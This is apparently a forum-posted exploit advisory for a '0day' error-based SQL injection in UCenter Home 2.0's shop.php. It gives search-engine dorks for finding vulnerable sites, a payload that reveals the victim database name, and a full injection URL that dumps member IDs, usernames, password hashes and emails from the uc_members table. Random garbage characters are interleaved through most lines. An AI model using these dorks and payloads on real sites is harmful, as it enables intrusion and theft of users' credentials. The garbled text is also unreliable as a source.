: A6 v# x! f4 ]9 v' t- r__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
" E* c2 B, e0 u( u$ b( c
5 h) _8 h' V* [ 6 Z- @' M% p( l
4 e1 j+ H: T' ?* d" q' y
*/ Author : KnocKout # u# Y3 g( Y+ q7 t, G$ _" U
$ R3 Z( S/ A) L l/ ^) J*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
: k1 I1 t, N. A; U; |" c0 w! ?9 b0 }- c- C% a
*/ Contact: knockoutr@msn.com
: C1 ]" `5 I: V9 t% ?% m; r6 l1 B8 h) R1 H7 p
*/ Cyber-Warrior.org/CWKnocKout - }8 e/ T# A; P. W6 N; ?. p
# @! R2 Z# m. `/ x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' O1 M1 k, y- _. S
7 R( A0 ]% X$ y1 w+ F
Script : UCenter Home 0 g9 |$ b& ^$ f0 E# y
$ d5 E5 K. t, z" v( k E
Version : 2.0 3 R# Y: n6 J) v8 {3 {0 N, b- k" j) s4 a
) a* v, G. |# a& l# r! X; c3 F) tScript HomePage : http://u.discuz.net/
3 U7 w( q, [3 _
4 S1 K4 l c4 |: a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' D3 r: [8 Z3 X, N( j
! K# a- S- l% s) L* H: v, A( pDork : Powered by UCenter inurl:shop.php?ac=view 9 K, q, W5 b h% D0 b* c; o
* G3 U8 @3 i3 Q& o8 lDork 2 : inurl:shop.php?ac=view&shopid= * W8 L2 _' y9 M
' n, Y1 Y r$ h1 D: }9 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: v0 n( d5 x" y6 L0 C. Y9 R, I% v6 \0 N8 J* E. U
Vuln file : Shop.php $ T$ c, L: L7 O6 G
1 x G( A7 s: Q0 [* L
value's : (?)ac=view&shopid=
* r2 g3 j' p1 U1 Q1 ]7 t. e5 ]5 \2 K% h) J6 t4 Y t3 F) v+ L
Vulnerable Style : SQL Injection (MySQL Error Based) " Z. w4 b" C V) W
* C; Z. r( u8 L
Need Metarials : Hex Conversion
! e7 `4 B7 \- n9 H* i8 J
" Y) B- z6 s# s: N3 {- a% `4 f__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; Y2 p* k1 K2 |$ i% L% l0 T, D! \% \$ Z* k5 e
Your Need victim Database name. 9 _$ J$ ?$ k3 S- |% b
6 a& b/ q" f, v: afor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
. {& ]3 i' t+ r2 @3 {- o2 _* K5 X ~. v
.. 7 s8 ]/ Q/ q3 t) O3 m
. g7 V' r8 B, R$ h0 [$ B# q6 s; jDB : Okey. ; ]; M2 w8 s+ ^: C0 h' m [' x
: c% p9 X5 w& Nyour edit DB `[TARGET DB NAME]` ' ^) \& H+ o+ |4 Q0 b, P
; p' ? y) c) T0 s
Example : 'hiwir1_ucenter' 1 f _: ^2 v$ n
9 C/ X* T5 J" L' ~3 k0 ZEdit : Okey. 2 b$ Q# j: [5 }) T4 L1 `; V1 _
5 r+ a/ T) M9 J1 iYour use Hex conversion. And edit Your SQL Injection Exploit.. ; u6 q& r0 d) g% |" a/ w
8 _' q5 D* K8 b, {: V ' [ @- v8 u, x; |$ X" `
2 {5 u) H$ D; p p- aExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 S1 |- g" W' k2 s4 y- T, i
|